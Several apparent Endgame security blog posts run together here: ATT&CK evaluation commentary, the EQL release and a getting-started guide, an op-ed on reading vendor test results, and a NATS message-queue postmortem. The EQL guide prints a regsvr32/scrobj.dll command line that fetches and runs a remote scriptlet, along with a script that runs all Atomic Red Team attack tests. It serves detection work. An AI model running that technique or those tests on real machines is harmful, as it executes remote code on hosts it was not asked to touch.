None of this is intended as a criticism of MITRE’s evaluation. In fact, they’ve taken care not to overstate what the test is by providing information about evaluated products that is narrowly scoped around post-compromise visibility. They haven’t attempted to score or rank vendor products, and neither should we.

Even teams new to ATT&CK should be working to incorporate it into their security program. There is a lot to consider, but there are ways to get started by taking small bites out of the huge ATT&CK sandwich. We’ve recently written about this topic, with some of that information available here.

What about Endgame’s evaluation?

We are pleased with how the evaluation describes our capabilities. Our agent provides visibility into the vast majority of techniques tested by MITRE in the evaluation, using a good balance of alerting behavioral detections and straightforward visibility into activity via our telemetry. Some of the noteworthy items in the results include:

ATT&CK Integration. The results showcase our product’s long standing ATT&CK integration where behavioral detections are linked to ATT&CK.
Access to Telemetry. MITRE’s results detail our interactive process tree, Endgame Resolver™. Telemetry is easily visible from this tree. It’s not readily apparent from static screenshots, but the entire tree is interactive and response actions can be taken right from the tree.
Enrichments. Custom enrichments are shown for ATT&CK-relevant items that didn’t make sense for alerting. For example, execution of ipconfig doesn’t create alerts on its own, but if it is related to processes with higher confidence alerting, the potential security relevancy of that ipconfig execution is highlighted for the user.
Memory Introspection. In-memory artifact capture is also showcased in the evaluation, with artifacts such as strings present in injected threads automatically captured for inspection.
Everyone Has Gaps and Differences. Some visibility gaps exist, and for most of those, we already have robust solutions in flight. For example, our customers will be excited to see enhanced network data capture in our next monthly release. In this ATT&CK evaluation, none of these gaps are news to us and we have some disagreement reflected in the Notes about whether some are actually gaps versus differences in evaluator expectations and workflow. That said, we look forward to continual assessment and relentless improvement.

What’s next?

We’re proud to have participated in this evaluation and look forward to participating again, should MITRE continue to lead evaluations. We look forward to continued collaboration with MITRE on ways to design and run both this evaluation and other competitive testing through our participation in AMTSO. And, we’ll continue to contribute to the community’s overall understanding of how to build a security program, including how to operationalize ATT&CK. And, of course, we’ll keep building and enhancing the Endgame platform for our current and future customers.

EQL, or the Event Query Language, is an elegant, powerful, and extensible language built in-house at Endgame to express relationships between security-relevant events. We designed it from the ground up to be generic, apply to multiple use cases, and avoid reliance on any particular architecture.

EQL is part of the core technology that drives our endpoint security product. It powers high confidence detections that run on customer endpoints, it is used to perform basic searching, and it gives hunt teams the tooling necessary to sift through massive amounts of data across their endpoint data and detect intrusions. But, there’s nothing inherently tied to Endgame with the language itself.

Up until now, the only way to use EQL was via the Endgame product. That changed today with the public release of EQL. This release includes the core EQL language, a schema mapping to Sysmon, and a set of analytics initially focused on Atomic Blue.

Why did we build and open source this?

It’s becoming a cliché, but it’s true: looking for signatures of known malware or infrastructure IOCs is helpful, but it’s not enough. Security practitioners must assume that adversaries have breached defenses and are conducting operations inside their networks. Because of this, security teams must not only worry about prevention, but also about how they can detect activity post-compromise.

The security community has rallied around the MITRE ATT&CK framework as an important knowledge base of post-compromise adversary activity. We’ve been thrilled to see rapid growth in the number of security teams and researchers working to understand the detection opportunities and challenges in the post-compromise space. However, we note (as do many others) that the tools available to our community for universal expression of post-compromise analytics have some serious limitations which we’ll describe further below.

Arguably the most significant challenge has been the coupling between everyone’s unique data sources and their analytics built on top of that data and corresponding schema(s). This has made it difficult to share actionable analytics between teams. After reading our introductory EQL blogpost, taking our product for a spin, or watching Endgame researchers talk about EQL, a number of researchers began talking to us about how EQL could fill this gap. This matches internal observations we’ve had for over a year - that if we release it to the community, EQL will improve the community’s collective ability to express detection logic and share amongst teams.

While EQL has been linked to the Endgame product, there are no inherent ties or dependencies. We of course natively support a mapping to our rich endpoint-centric dataset, robust query support, and automated detections via EQL in our powerful architecture. However, mappings are possible to any security dataset, and we believe now is the time to allow people outside our customer base to use EQL.

With this release, we are providing the core language, a sysmon integration, and a python-based EQL engine, which includes CLI functionality to run EQL queries over JSON. We’re also providing example analytics which are described later in this post. With this toolkit, users can immediately begin prototyping analytics in EQL.

EQL Advantages

We are not here to criticize other technologies and projects which have sought to achieve goals like common schemas, querying structure, and other things similar to what we’ve done with EQL. EQL has some significant advantages which we hope cause people in the security community to take a closer look, even if other technologies are being used or considered. These include:

Supporting the necessary logic to express relationships between security-relevant events. EQL can compare values and fields with exact or wildcard matching and supports basic AND, OR, NOT boolean search operations. Fields can be compared to strings, integers, decimal values, and against other fields. Most importantly, matching is enabled across a series of events including different types of events (e.g. process, file, and registry) rather than matching on only a single event.
Minimal learning curve to write analytics. EQL looks like many other query languages. It is intended to search across structured data in an intuitive manner which is highly conducive to quickly writing behavioral analytics. This also leads to excellent readability of each analytic. It also supports traditional IOC searching, but EQL makes it easy to accurately describe activity and behavior beyond simple IOCs.
No dependence on particular data sources or schema. Other technologies are tied closely to a given data source, and those writing analytics need to focus heavily on that particular data source and schema to write an analytic instead of just focusing on the logic they’re trying to express. EQL’s method of abstracting data sources via extensible schema mappings is powerful and allows for easy use without any need to pre-normalize data.
Built to hunt. EQL includes strong native post-processing capabilities such as sorting, filtering, and stacking, which allow a user to easily filter out noise. Its schema translation capability also makes it straightforward to extend across multiple data sources without a need for data normalization. Data normalization into the universal schema is supported for users who want to eliminate the need for query-time normalization.

EQLLib and Atomic Blue

We’re providing robust documentation on the many interesting EQL primitives and operators which are part of this release. We wanted to go further than just unleashing EQL on people in the form of a tool and documentation alone. To that end, we have provided a rich set of analytics called EQLLib to help people become familiar with the language and try things out.

We’re huge fans of our partner Red Canary’s Atomic Red Team project. It is the most well-known and expansive test framework of adversary techniques out there. Adversary simulation projects are generally great in that they allow teams interested in detection aligned to the MITRE ATT&CK matrix to easily generate artifacts on systems.

Atomic Red does a great job generating artifacts for the majority of techniques described by ATT&CK, but there’s no expansive mapping of Atomic Red into data source-agnostic language that a defender can action. Atomic Blue starts to fill this gap. Atomic Blue is a curated set of EQL logic which describes how to find endpoint artifacts associated with execution of a significant number of techniques covered by Atomic Red Team.

You can find Atomic Blue within the EQLLib repository. This initial analytics repository is significant, but we’ve only scratched the surface of what’s possible, and we look to the community to help us expand even further.

What’s next for this project?

This initial release is the beginning of the journey, not the final destination. Next week, you’ll see an expanded “how-to” guide along with some data to make it even easier to use EQL. To expand the applicability of EQL, we plan to release support for additional data sources and technologies in the coming months. You’ll also see us releasing additional analytics on a regular basis as the technology expands and evolves.

We’re looking forward to feedback and contributions from others. We strongly believe that we’re collectively lacking a good way to describe detection logic universally across datasets, and EQL is a great way to address this and other limitations. Please try it out and let us know what you think.

If you missed our introductory post about the Event Query Language (EQL) or our recent announcements about the public release of EQL, then we're sorry we missed you, but have no fear, this is your getting started guide with EQL.

Event Query Language Refresher

As a quick recap, EQL is a language to express relationships between events and additionally has the power to normalize your data regardless of data source and not constrained by platform. EQL is already integrated into the Endgame platform to bolster our behavior-based detections, but now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology. Whether you want to simply search with EQL, perform basic hunting via basic data stacking and filtering, or express complex behaviors as part of hypothesis-based hunting, EQL’s flexibility as a language can help improve your team’s effectiveness in many different ways.

We also built a library of analytics written in EQL, aimed to provide a new way for the infosec community to detail detections of attacker techniques. The EQL Analytics Library comes with a set of behavior based detections mapped to MITRE ATT&CK™, and can convert between various data formats. Please feel free to contribute analytics or contact us so we can help provide the blue perspective to the various red emulations out there.

Install EQL

First things first, let's install EQL. For full details, visit the EQL documentation.

The EQL module currently supports Python 2.7 and 3.5 - 3.7. Assuming a supported Python version is installed, install EQL directly from PyPi with the command:

$ pip install eql

If Python is configured and already in the PATH, then eql will be readily available, and can be checked by running the command:

$ eql --version

eql 0.6.0

Source code for EQL can be found here.

Getting Data

We know you are excited to execute an EQL query, so let's get some data ready for you.

Our initial release required interested users to generate data. Being aware that this might represent a barrier to entry for some, we have provided a static test dataset to use while exploring the tool and syntax, which can be found here. This data was generated by executing subsets of Atomic Red and RTA while simultaneously collecting events using Sysmon. We additionally normalized the data, but that is not required to get you started on EQL. Keep in mind, we know the data is not perfect or complete, and we would gladly welcome a hand.

Sysmon

If you prefer to generate your own data by detonating your own scripts or directly running all tests from Atomic Red Team then follow our Sysmon guide.

Install

Start by downloading Sysmon from SysInternals.

To install Sysmon, from a terminal, simply change to the directory where the unzipped binary is located, then run one of the following commands as an Administrator:

To capture all default event types, with all hashing algorithms, run:

$ Sysmon.exe -i -h * -n -l

To configure Sysmon with a specific XML configuration file, run:

$ Sysmon.exe -i C:\path\to\my\config.xml

Full details of what each flag does can be found on the Microsoft Sysmon page

Getting Sysmon logs with PowerShell

Helpful PowerShell functions for parsing Sysmon events from Windows Event Logs can be found in our utils directory, from within eqllib. The code below is from utils/scrape-events.ps1

Getting logs into JSON format can be done by piping to PowerShell cmdlets within an elevated PowerShell.exe console.

# Import the functions provided within scrape-events

Import-Module .\utils\scrape-events.ps1

# Save the most recent 5000 Sysmon logs

Get-LatestLogs | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

# Save the most recent 1000 Sysmon process creation events

Get-LatestProcesses | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

To get all Sysmon logs from Windows Event Logs, run the PowerShell command

Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

Atomic Red Team

Bringing Atomic Red Team into the mix, we can collect sysmon data for every atomic test contained within. Atomic Red Team is an aggregation of atomic tests maintained by Red Canary, which replicate adversary behaviors described in MITRE ATT&CK.

Once sysmon is up and running, use the following PowerShell code to execute Atomic Red Team from the Github repository:

[System.Collections.HashTable]$AllAtomicTests = @{}

$AtomicFilePath = 'C:\AtomicRedTeam\atomics\'

Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {

$currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)

$parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw ))

$AllAtomicTests.Add($currentTechnique, $parsedYaml);

}

$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value }

Now, as stated above, get all Sysmon logs from Windows Event Logs with the following PowerShell command:

Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath atomic-red-team-data.json

Query like a Boss

Enough is enough, let's write some rules! Please start by familiarizing yourself with EQL grammar and syntax, seen here or even from our initial blog post.

For demo purposes, we will use the dataset titled, normalized-sysmon-T1117-AtomicRed-regsvr32.json, which is an Atomic Red Team test for regsvr32 misuse. We encourage you to try some of these practices on larger datasets, which we have provided.

Let's first get a feel for how many events we have in the data.

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count'

{"count": 150, "key": "totals"}

To breakdown even further, we can see how many of each event_type we have

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count event_type'

{"count": 1, "key": "network", "percent": 0.006666666666666667}

{"count": 4, "key": "process", "percent": 0.02666666666666667}

{"count": 56, "key": "registry", "percent": 0.37333333333333335}

{"count": 89, "key": "image_load", "percent": 0.5933333333333334}

Great, so we have data, let's try to understand it further. Maybe since we know this is T1117, we want to just look for regsvr32?

$ eql query -f normalized-sysmon-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | count"

{"count": 143, "key": "totals"}

Ok, as expected, we have regsvr32, let's examine the command line artifacts and unique those results to see if notice anything.

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | unique command_line"

{"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato... scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}

{"event_type": "image_load", "image_name": "regsvr32.exe", "image_path": "C:\\Windows\\System32\\regsvr32.exe", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237140000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

As we can see, we have an atomic test loading scrobj.dll. Let’s check out our current analytics in eqllib. First, let’s look at the Suspicious Script Object Execution analytic:

image_load where image_name == "scrobj.dll" and

process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")

If we look at our dataset, what do we see?

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "image_load where image_name == 'scrobj.dll' and process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')"

{"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}

Very cool, what about our Atomic Blue analytic within eqllib? We can run our existing analytic to see if it matches. The analytic looks like,

process where subtype.create and

process_name == "regsvr32.exe" and

wildcard(command_line, "*scrobj*", "*/i:*", "*-i:*", "*.sct*")

Now, let’s switch to eqllib to use the available rules with our survey capability:

$ eqllib survey -f normalized-T1117-AtomicRed-regsvr32.json eqllib/analytics/defense-evasion/T1117-scrobj-load.toml

Through EQL, you can also look across different events types. This is important because it can allow us to bolster up commands for tighter detections and reduce the occurence of false positives. Here we check to see if the subsequent image load of the scrobj.dll and network event for downloading the remote sct file or other C2 actions are also occurring, which indicates that the technique progressed and more likely succeeded. We can do all these things with EQL!

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "sequence by pid [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')] [image_load where image_name == 'scrobj.dll'] [network where true]"

{"destination_address": "151.101.48.133", "destination_port": "443", "event_type": "network", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "protocol": "tcp", "source_address": "192.168.162.134", "source_port": "50505", "subtype": "outgoing", "timestamp": 131883573238680000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}

We could also take stdout and pipe to powershell or JQ and make pretty tables --the power is yours.

I feel Atomic Blue

If you were the overachiever and detonated all the Atomic Red Team tests, then welcome Atomic Blue (https://eqllib.readthedocs.io/en/latest/atomicblue.html).

In the EQL Analytics Library, the analytics that map to Atomic Red Team are called Atomic Blue Detections. In our earlier blog post, we showed how these are detections that work in tandem with Atomic Red Team, since both are heavily influenced by the the MITRE ATT&CK framework. Checkout our current coverage by surveying the rules against the data you just collected by executing:

$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/

This survey script can also provide just counts, if you’re looking for a quick breakdown.

$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count

How did we do? Wish we had more rules? Well, we can't spoil all the fun. We will have more analytics posted soon, but of course, please contribute and help out the community! We want this to be a shared effort, with various types of analytics --even beyond ATT&CK.

Analytic Pause

Let's pause for a moment and talk analytics. You may have recognized that the metadata and query that the analytic is comprised of is structured in TOML.

A breakdown of the analytic schema is as follows:

categories: The groups that the analytic belongs in. The detect category indicates that an analytic is potentially useful as an alert. The hunt category indicates that an analytic might catch more generic behavior, or a behavior that has false positives and frequently matches benign activity.

contributors: Put your name or organization here!

confidence: A gut feel about the confidence of the rule--how likely the analytic will match suspicious activity.

created_date: When the rule was originally created.

description: Short description of the analytic. This should describe how it works, what is supposed to be detected, and potential false positives.

name: Title the rule as descriptive, but not overly verbose.

notes: Any disclaimers, caveats or other notes that would be helpful to share to the audience.

os: What operating systems the analytic is written for. We’ve only written analytics for Windows so far, but welcome more!

references: Links to blogs or other sources of information to support the technique or analytic logic.

techniques: A mapping to the relevant ATT&CK techniques, (e.g. T1015).

tactics: A mapping to the relevant ATT&CK tactics. This isn’t necessarily all of the potential tactics on the technique pages for ATT&CK, and often depends on the detection details.

tags: Tags used for grouping the rule. For instance, all Atomic Blue rules are tagged with “atomicblue.”

updated_date: When the rule was last updated.

Data Normalization

You probably noticed the --source parameter when using eqllib,

$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count

This is another powerful aspect of EQL. EQL queries are platform agnostic and can run on any data source, as long as we provide a data source schema mapping. For example, a process identifier is denoted by the pid field. If a new data source reports its process identifier with a field such as process_id, we represent this mapping from the process_id -> pid. From there, any usage of pid is immediately compatible.

We can also define more sophisticated mappings. In Sysmon, there is no field to represent the file name for a running process. Our schema calls this process_name, but in Sysmon it’s nested within the Image field. Since mappings can also be defined with functions, we can define a mapping from baseName(Image) to process_name. This mapping works for both normalizing data and actual queries. For instance process_name == "net.exe"will be converted to Image == "*\\net.exe". This is just one way that we achieve compatibility with various data sources with different data model choices.

This is a powerful construct - analytics written once can be run on wide variety of data sources and platforms. All we need is a mapping when field names are different.

Currently we have Microsoft Sysmon mapped, with more sources to come. But, you don’t have to wait for us. As you can see from the sysmon.toml schema, adding your own data sources is straightforward and it is automatically parsed by eqllib.

Have Fun!

Please follow us @eventquerylang. We will be updated our docs soon with a section on how to contribute, but in the meantime please feel free submit PRs or post issues. We look forward to sharing more blogs posts in the near future as we write more analytics and share analytic packages specifically designed to help you hunt. Cheers!

DATA MISAPPROPRIATION CHEAPENS MITRE ATT&CK EVALUATION, BUT HERE’S WHAT IS IMPORTANT...

As a former Gartner analyst who led the EPP Magic Quadrant, I’m having a blast reading the vendor write-ups explaining their performance against the APT3-esque set of tests in the recent MITRE ATT&CK assessment, with vendors grabbing for one scoring algorithm that gives a single overall metric to prove who’s the best.

The unfortunate truth is that vendors are making a circus out of what is the most comprehensive assessment of EPP + EDR vendor capabilities to date.

I’m disappointed that so few vendors have spent time to highlight that the ability to provide detection data is only part of the problem. It’s just as important to consider how that data is made available to your organization’s security operators, and how much faster your teams can make educated, confident decisions to contain threats and block adversaries.

The MITRE assessment has almost no way to take into account the blue team capabilities required to use the products effectively. So, the bottom line is, to quote myself from 14 months ago:

“Choose an EPP that improves the workflow, efficiency, and effectiveness of the tools and humans you have today.“

With that in mind, there are some elements in this assessment that are of more importance than others to most organizations evaluating any EPP or EDR vendor.

NONE – The product did not detect this activity at all, a complete miss.

NONE with Note – The product did not detect this activity as immediately malicious, but the data was captured and could be hunted.

SPECIFIC BEHAVIOR & SPECIFIC BEHAVIOR TAINTED – A specific detection that indicates exactly which malicious activity occurred. The modifier TAINTED means that this detection was made as a by-product of a detection far earlier in the attack chain, and the data is available somewhere to confirm this detection.

The first thing many IT Leaders ask is, “Which endpoint vendor blocks everything?”. The answer to that is a quick and easy, “None of them”.

After “Which vendor blocks everything?” comes the question, “Okay then, who missed the most?”. MITRE provides a good amount of data here which makes the question a little simpler to answer.

BUT – that doesn’t show the whole story. There are two versions of the detection type that MITRE uses to describe as missed malicious activity: “None” and “None with note”.

While “None” is self-explanatory – this activity completely bypassed detection methods and no data was collected that could point to it – “None with note” indicates that although a specific detection wasn’t highlighted by the vendor, the blue team was able to hunt and discover the activity. In other words, which vendors collect the right types of event data to best enable the advanced part of EDR – Threat Hunting.

That’s the advanced part of the “ease of use” spectrum, but what really matters to the IT Leaders I’ve spoken to in the past week is contained in the “SPECIFIC” and “SPECIFIC TAINTED” detection types. These mean that the platform tells you what matters, and you do not need an expert to tell you this specific event matters. It is the closest thing to usability guidance in this type of evaluation.

For those organizations with the time and expertise to invest in a full analysis tailored to their specific needs, the ATT&CK evaluation data is a gold mine.

You can dive into the results to see which vendors had a whole bunch of “DELAYED” detections (i.e hours and days) because they rely on a managed service to watch for suspicious activity. You can look at the highly FP-prone generic detections that might get lucky. And you can take the data, decide what detection methods matter most to you, and build a scorecard that's right for you.

As always, my cautions are that third party tests are a great indicator of whether a vendor is fit-for-purpose and can certainly help organizations narrow down a shortlist of vendors. For the first time, our industry has a useful view point into both prevention *and* detection/response capabilities. But they are data points not decision points. It feels like Groundhog Day having to repeat it over and over again but there is no one-size-fits-all, and usability should rank just as high in a shortlist or PoC.

At Endgame Engineering, we believe that a high standard for performance can’t exist without taking risks and learning from failure. It’s necessary for growth. We learn from other companies like Honeycomb.io and Github that document and publish their internal postmortems. These engineering teams understand transparency is fundamental to building great teams and delivering customer value with a SaaS product. We think so, too.

We also believe it’s important to eat our own dog food. That’s why the very same endpoints we use to develop our product also run it. In October, we experienced a brief outage on this system. Production resiliency, to include our dogfooding instance, is paramount to our unique mission. We take all production incidents seriously.

This postmortem provides an overview of the technology, a summary of the problem and its reproduction, and lessons learned. We are also releasing two tools we developed during this analysis to help others find and fix similar problems in the future.

Background

Last year we began migrating from RabbitMQ to nats.io, a Cloud Native (CNCF) log based streaming messaging system written in Go. NATS is simple, highly performant and scalable.

Simplicity matters. It makes a difference when an engineer is observing a complex, distributed, and rapidly evolving system. Have you ever seen an Erlang stack trace?

Performance and scalability matters, too. Our customers protect online and disconnected endpoints with our product. NATS helps us deliver speed and scale for our customers. As Robin Morero says in this Pagero blog, “performance, simplicity, security and availability are the real DNA of NATS.”

NATS is a compelling technology choice. Most of our microservices are written in Go. After an analysis by our engineering team, we started repaving most of our major microservice highways with NATS.

Symptoms

An initial triage narrowed the problem down to one of our NATS streaming server channels, sensor.session.open.

This channel is used by sensor management microservices to notify subscribers when new endpoints are online. Messages published to this subject contain important information to route tasks to sensors.

NATS provides monitoring endpoints to observe channels and subscribers.

In the output from /channelsz below, we observe a count of published messages to sensor.session.open with last_seq. We also see the number of messages delivered and acknowledged for each subscriber with last_sent and pending_count respectively. Each last_sent field should be close or equal to last_seq when the system is behaving.

[root@endgame log]# curl "http://localhost:8222/streaming/channelsz?offset=0&subs=1&channel=sensor.session.open"
{
  "name": "sensor.session.open",
  "msgs": 4,
  "bytes": 4112,
  "first_seq": 11052,
  "last_seq": 11055,
  "subscriptions": [
    { 
      "client_id": "ActiveMon_29677", 
      "inbox": "_INBOX.4OxqodxyKwLDyEUZFoH3vk", 
      "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXEg", 
      "is_durable": false, 
      "is_offline": false, 
      "max_inflight": 1024, 
      "ack_wait": 30, 
      "last_sent": 11055, 
      "pending_count": 0, 
      "is_stalled": false 
    },
    { 
      "client_id": "SessBotOpen_29704_38898667", 
      "inbox": "_INBOX.d3KGu8K8HkoXZgt41F3Ihf", 
      "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXUD", 
      "queue_name": "sensor.session.open:sensor.session.openSessBotOpen.qg", 
      "is_durable": true, 
      "is_offline": false, 
      "max_inflight": 8192, 
      "ack_wait": 30, 
      "last_sent": 10929, 
      "pending_count": 0, 
      "is_stalled": false 
    },
    {
      "client_id": "HiggoBot_30489_128befbc", 
      "inbox": "_INBOX.wUiUbK6U8Z67tzJP6Qjrb7", 
      "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXvp", 
      "queue_name": "sensor.session.open:sensor.session.openhiggo.qg", 
      "is_durable": true, 
      "is_offline": false, 
      "max_inflight": 8192, 
      "ack_wait": 30, 
      "last_sent": 11055, 
      "pending_count": 0, 
      "is_stalled": false 
    }
  ]
}

Here we see 11,055 messages have been published so far to sensor.session.open with last_seq. But last_sent for one of the three subscribers, SessBotOpen, is 126 messages behind. This is bad.

We observed /channelsz several more times. Each time, last_sent for SessBotOpen did not increase while the other two subscribers kept up with the channel’s last_seq. Moreover, the pending_count for SessBotOpen remained at zero. If messages were delivered but unacknowledged, we’d expect this count to be more than zero.

We suspected NATS streaming server was not delivering published messages to SessBotOpen. This microservice learns where to route sensor tasks by observing messages published to this channel.

A review of NATS issues showed us earlier this summer a similar bug was reported by Todd Schilling in nats-streaming-server issue #584.

This bug was fixed in v0.10.2 by Ivan Kozlovic. We were still using v0.9.2 in October.

While it’s enticing to assume an upgrade of NATS streaming server resolves our issue, we had no proof issue #584 was the root cause. Assumptions are the enemy of debugging. We did not know how to reproduce the problem. Without a reproduction, we could not promise our customers and partners this problem is fixed -- and that’s really important to us.

Reproduction

To come up with a reproduction theory we could test, we looked at the evidence and studied the NATS streaming server code.

During an upgrade, we noticed a new log message when NATS streaming server was restarted.

Oct  3 01:16:24 endgame nats-streaming-server[28574]: DEBUG STREAM: [Client:SessBotOpen_29704_38898667] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg

We’d not seen this log before. To see what it indicates, take a look at the code that produces it in server.go line 3087 from NATS streaming server v0.9.2 on github.

This log comes from a function named performDurableRedelivery(). It is called when NATS needs to resend a durable subscriber outstanding (unacknowledged) messages.

Let’s learn more about durable subscribers. From the nats.io documentation:

Our SessBotOpen client is a durable subscription. Messages sent to it before NATS streaming server was restarted were redelivered after the restart because they were not acknowledged.

Two of the subscriptions to this subject are durable. This means there is additional evidence that can reveal what happened in the file stores on disk. The location of these files is managed by the configuration file.

The structure of these files is defined here in filestore.go. Each time a message is published to the durable queue, it is saved to msgs.x.dat and indexed in msgs.x.idx in a function called writeRecord(), defined here in filestore.go on line 657.

If you search for calls to writeRecord in filestore.go, you’ll see this data could help us reproduce the bug. The timestamps associated with each message in the index seem especially useful.

To see this data, we created parse-nats-data.

Let’s examine messages from an exemplar system where we observed a similar problem. We focus on the last message published before NATS restarted and the first one after it came back online. We restarted NATS streaming server at 2018-10-03 01:16:24 UTC.

[root@endgame endgame]# ./parser -i /opt/endgame/var/natssd/sensor.session.open/msgs.1.idx -d /opt/endgame/var/natssd/sensor.session.open/msgs.1.dat
[2018-10-03 01:13:59.825685034 +0000 UTC] seq: 10929 | size: 913 | offset: 10218743 | crc32: e55eeefc msg size: 913
[2018-10-03 01:19:03.261193242 +0000 UTC] seq: 10930 | size: 884 | offset: 10219664 | crc32: a58d8ed1 msg size: 884

Recall earlier that last_sent for client SessBotOpen was stuck at message 10,929. Now we have evidence it was the last message sent before the restart.

Next let’s look at the subs.dat subscriber data for sensor.session.open to see what else we can learn. This file records several interesting subscription and message events. The types of events stored in this file are described in filestore.go on line 383.

The subs.dat file records the following events:

New subscription to a subject
Updates to an existing subscription
Subscription deletes (unsubscribes)
Message acknowledgements
Delivered messages

Analyzing this evidence could help us reproduce the bug. The format of this file is the same. The structure of each message is defined in nats-streaming-server/spb.

NATS streaming records metadata about every message and each subscription activity. Let’s focus only on the SessBotOpen client that subscribes to sensor.session.open.

In the output below from parse-nats-data, we’ve included just three event types:

New or updated subscriptions
First published message after SessBotOpen subscribes
First acknowledged message after SessBotOpen subscribes

[root@endgame endgame]# ./parser -t subscriptions /opt/endgame/var/natssd/sensor.session.open/subs.dat
ID: 2 "SessBotOpen_10792_bcff6c27" Type: subRecNew LastSent: 0
ID: 2 SeqNo: 1 subRecMsg
ID: 2 SeqNo: 1 subRecAck
ID: 2 "SessBotOpen_2421_1b27960d" Type: subRecUpdate LastSent: 7271
ID: 2 SeqNo: 7272 subRecMsg
ID: 2 SeqNo: 7272 subRecAck
ID: 2 "SessBotOpen_3564_35a06f8d" Type: subRecUpdate LastSent: 7381
ID: 2 SeqNo: 7382 subRecMsg
ID: 2 SeqNo: 7382 subRecAck
ID: 2 "SessBotOpen_7104_959261a6" Type: subRecUpdate LastSent: 7492
ID: 2 SeqNo: 7493 subRecMsg
ID: 2 SeqNo: 7493 subRecAck
ID: 17 "SessBotOpen_2415_b7e88646" Type: subRecNew LastSent: 9517
ID: 17 SeqNo: 9518 subRecMsg
ID: 17 SeqNo: 9518 subReqAck
ID: 17 "SessBotOpen_2340_3a3b37c5" Type: subRecUpdate LastSent: 9599
ID: 17 SeqNo: 9599 subRecAck
ID: 17 "SessBotOpen_8193_05e875e3" Type: subRecNew LastSent: 9517
ID: 17 SeqNo: 9600 subRecMsg
ID: 17 SeqNo: 9600 subRecAck
ID: 17 "SessBotOpen_2979_e926b758" Type: subRecNew LastSent: 10863
ID: 17 SeqNo: 10864 subRecMsg
ID: 17 SeqNo: 10864 subRecAck
ID: 17 "SessBotOpen_29704_38898667" Type: subRecNew LastSent: 10929
ID: 17 SeqNo: 10929 subRecAck

An interesting pattern emerges in the data above.

First, we see the internal NATS subscription ID is frequently reused each time a new SessBotOpen client subscribes after a restart. Not shown above in the output for subs.dat are other new subscriptions. Each time other clients subscribe to channels they seem to get a new subscription ID. SessBotOpen does not. This is unusual.

Second, each time SessBotOpen subscribes to sensor.session.open, we see the next message in the sequence (last_sent + 1) published and acknowledged – except for two clients:

SessBotOpen_2340_3a3b37c5
SessBotOpen_29704_38898667

In both cases, something unique happens. After SessBotOpen subscribes, an outstanding message is acknowledged. Specifically, the last_sent message before the restart.

Recall performDurableRedelivery() is responsible for redelivering all outstanding messages to a durable subscriber when it resubscribes. Let’s go back to the NATS streaming server logs.

[root@endgame log]# zcat natssd*.gz | grep Redelivering
Sep  5 19:34:07 endgame nats-streaming-server[1042]: DEBUG STREAM: [Client:SessBotOpen_2340_3a3b37c5] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg
Oct  3 01:16:24 endgame nats-streaming-server[28574]: DEBUG STREAM: [Client:SessBotOpen_29704_38898667] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg

We see the same two clients from subs.dat. This is a compelling lead. And it’s possible the problem also occurred on this exemplar system back in September but we didn’t detect it. NATS streaming server was restarted 8 minutes later.

